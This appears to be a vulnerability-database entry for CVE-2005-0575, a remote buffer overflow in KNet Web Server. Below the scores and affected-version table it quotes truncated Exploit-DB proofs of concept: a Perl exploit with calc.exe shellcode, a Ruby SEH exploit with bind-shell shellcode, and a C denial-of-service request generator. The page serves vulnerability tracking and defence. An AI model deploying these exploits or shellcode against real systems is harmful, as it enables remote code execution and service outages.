CVE-2005-0575
published 2005-05-02CVE-2005-0575: Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.77%
93.9th percentile
Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP GET request.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| stormy_studios | knet | — | — |
| stormy_studios | knet | — | — |
| stormy_studios | knet | — | — |
| stormy_studios | knet | — | — |
| stormy_studios | knet | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
KNet Web Server 1.04b - Stack Corruption Buffer Overflow
exploitdb·2013-04-12
CVE-2005-0575 KNet Web Server 1.04b - Stack Corruption Buffer Overflow
KNet Web Server 1.04b - Stack Corruption Buffer Overflow
---
#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3
use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul -
http://www.justanotherhacker.com\n";
die "Usage $0 \n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to
$host:$port\n";
# Shellcode for calc.exe
$shellcode=
"\x89\xe2\xda\xd5\xd9\x72\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41
Exploit-DB
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb·2013-03-29
CVE-2005-0575 KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
sc_bind =
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\
Exploit-DB
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
exploitdb·2005-02-25
CVE-2005-0575 KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
---
/*
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Knet
*/
#include
#include
#include
#include
#include
#include
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=110943766505666&w=2http://secunia.com/advisories/14400http://www.exploit-db.com/exploits/24897http://www.exploit-db.com/exploits/24950http://www.securityfocus.com/bid/12671http://marc.info/?l=bugtraq&m=110943766505666&w=2http://secunia.com/advisories/14400http://www.exploit-db.com/exploits/24897http://www.exploit-db.com/exploits/24950http://www.securityfocus.com/bid/12671
2005-05-02
Published